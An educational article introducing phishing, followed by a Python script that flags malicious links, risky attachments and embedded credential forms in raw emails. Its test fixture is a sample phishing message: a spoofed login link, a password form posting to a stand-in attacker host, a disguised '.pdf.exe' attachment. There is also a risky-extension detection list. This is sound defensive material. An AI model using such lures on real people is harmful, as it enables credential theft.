Chances are good that at some point you’ve received a suspicious email urging you to click on a link or open an attachment. This email was most likely an example of the cybercrime known as phishing. This article serves as an introduction to phishing: what it means, how it affects individuals and organizations, and how security awareness and training tools can be used to reduce the threat of these attacks.
First, we’ll explore the three primary types of phishing email examples and how social engineering is the common thread with these types of attacks. Then, we’ll move on to what phishing can do, and why cybercriminals invest time and effort in phishing attacks. We’ll also look at what could happen if you were to fall for a phishing scam, either at work or in your personal life.
Finally, we’ll introduce some resources that will help you better understand the impact of phishing, as well as anti-phishing training modules and phishing tests designed to help individuals recognize and avoid attacks.
What is Phishing?
Phishing is when cybercriminals send malicious emails designed to trick people into falling for a scam. The intent is often to get users to reveal financial information, system credentials, or other sensitive data.
The term “phishing” came about in the mid-1990s, when hackers began using fraudulent emails to “fish for” information from unsuspecting users. Since these early hackers were often referred to as “phreaks,” the term became known as “phishing,” with a “ph.” Phishing emails try to lure you in and get you to take the bait. And once you’re hooked, you’re in trouble.
Phishing is an example of social engineering: a collection of techniques scam artists use to manipulate human psychology. Social engineering techniques include forgery, misdirection, and lying, all of which can play a part in phishing attacks. On a basic level, phishing emails use social engineering to encourage you to act without thinking things through.
Why Is Phishing a Problem?
Cybercriminals use phishing because it’s easy, cheap, and effective. Email addresses are easy to obtain, and emails are virtually free to send. With little effort and little cost, attackers can quickly gain access to valuable data. Those who fall for phishing scams may end up with malware infections (including ransomware), identity theft, and data loss.
The data cybercriminals go after includes personal information — like financial account data, credit card numbers, and tax and medical records — as well as sensitive business data, like customer names and contact information, proprietary product secrets, and confidential communications.
Cybercriminals also use phishing attacks to gain direct access to email, social media, and other accounts — or to obtain permissions to modify and compromise connected systems, like point of sale terminals and order processing systems. Many of the biggest data breaches — like the headline-grabbing 2013 Target breach — start with a phishing email. Using a seemingly innocent email, cybercriminals can gain a small foothold and build on it.
Cybercriminals use three primary mechanisms within phishing emails to steal your information: malicious web links, malicious attachments, and fraudulent data-entry forms. For additional examples, check out our Latest in Phishing blog series. You can also subscribe to our blog to receive notifications when new posts are published.
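Those three mechanisms are also what an email security gateway or an analyst's triage script looks for. The following is an added example written for this article, not code from the original page or from any product it mentions: it parses one raw message with Python's standard `email` library and reports a finding for each mechanism it sees: a link whose visible text names a different host than its `href` (or a host outside a caller-supplied trusted list), an attachment with a risky or double file extension, and an HTML form embedded in the body, especially one with a password field. The `RISKY_EXTENSIONS` list, the `example-corp.test`/`attacker.test` domains and the sample message built by `build_sample_email()` are all constructed for the example.

```python
"""Flag the three phishing delivery mechanisms (links, attachments, forms) in a raw email."""
import email
import re
from email import policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed list of extensions treated as risky; tune it to your environment.
RISKY_EXTENSIONS = {".exe", ".js", ".vbs", ".scr", ".hta", ".iso", ".lnk", ".docm", ".xlsm"}


class _Collector(HTMLParser):
    """Collect anchors (href + visible text), form actions and password inputs from an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []            # (href, visible text)
        self.forms = []            # form action URLs
        self.password_inputs = 0
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "a" and a.get("href"):
            self._href, self._text = a["href"], []
        elif tag == "form":
            self.forms.append(a.get("action", ""))
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.password_inputs += 1

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _host(url: str) -> str:
    """Lower-cased hostname of a URL; scheme-less text like 'bank.test/login' is accepted too."""
    if "://" not in url:
        url = "//" + url
    return (urlparse(url).hostname or "").lower()


def analyze_message(raw: bytes, trusted_domains=()):
    """Return a list of (mechanism, detail) findings for one RFC 5322 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    trusted = {d.lower() for d in trusted_domains}
    findings = []

    # Mechanism: malicious attachments (risky final extension, or a double extension like .pdf.exe).
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        suffixes = re.findall(r"\.[a-z0-9]+", name)
        if suffixes and suffixes[-1] in RISKY_EXTENSIONS:
            findings.append(("attachment", f"risky extension: {name}"))
        elif len(suffixes) > 1:
            findings.append(("attachment", f"double extension: {name}"))

    html_part = msg.get_body(preferencelist=("html",))
    if html_part is None:
        return findings
    collector = _Collector()
    collector.feed(html_part.get_content())

    # Mechanism: malicious links. Heuristic: visible text that looks like a URL but
    # names a different host than the real href, or any link to a host outside the trusted list.
    for href, text in collector.links:
        target = _host(href)
        shown = _host(text) if "." in text else ""
        if shown and shown != target:
            findings.append(("link", f"text shows {shown} but href goes to {target}"))
        elif trusted and target and not any(target == d or target.endswith("." + d) for d in trusted):
            findings.append(("link", f"link to untrusted host {target}"))

    # Mechanism: a data-entry form inside the mail body itself.
    for action in collector.forms:
        detail = f"form posting to {_host(action) or '(relative)'}"
        if collector.password_inputs:
            detail += " with a password field"
        findings.append(("form", detail))
    return findings


def build_sample_email() -> bytes:
    """Constructed sample message (not a real phish) that exercises all three mechanisms."""
    msg = EmailMessage()
    msg["From"] = "it-support@example-corp.test"
    msg["To"] = "employee@example-corp.test"
    msg["Subject"] = "Action required: verify your account"
    msg.set_content("Please view this message in an HTML-capable client.")
    msg.add_alternative(
        '<p>Your password expires today. Sign in at '
        '<a href="http://login.example-corp.test.attacker.test/reset">https://login.example-corp.test</a></p>'
        '<form action="http://collect.attacker.test/post">'
        '<input type="text" name="user"><input type="password" name="pass"></form>',
        subtype="html",
    )
    msg.add_attachment(b"MZ\x90\x00", maintype="application", subtype="octet-stream",
                       filename="Invoice.pdf.exe")
    return msg.as_bytes()


if __name__ == "__main__":
    for mechanism, detail in analyze_message(build_sample_email(), trusted_domains=["example-corp.test"]):
        print(f"[{mechanism}] {detail}")
```

Running it on the constructed sample prints one line per mechanism: the `.pdf.exe` attachment, the link whose text shows `login.example-corp.test` while the `href` goes to a host under `attacker.test`, and the credential form posting to `collect.attacker.test`. The link check is deliberately a heuristic: display text that is not URL-shaped ("Click here") is only caught by the trusted-domain rule, which is why that list is worth maintaining in any real deployment.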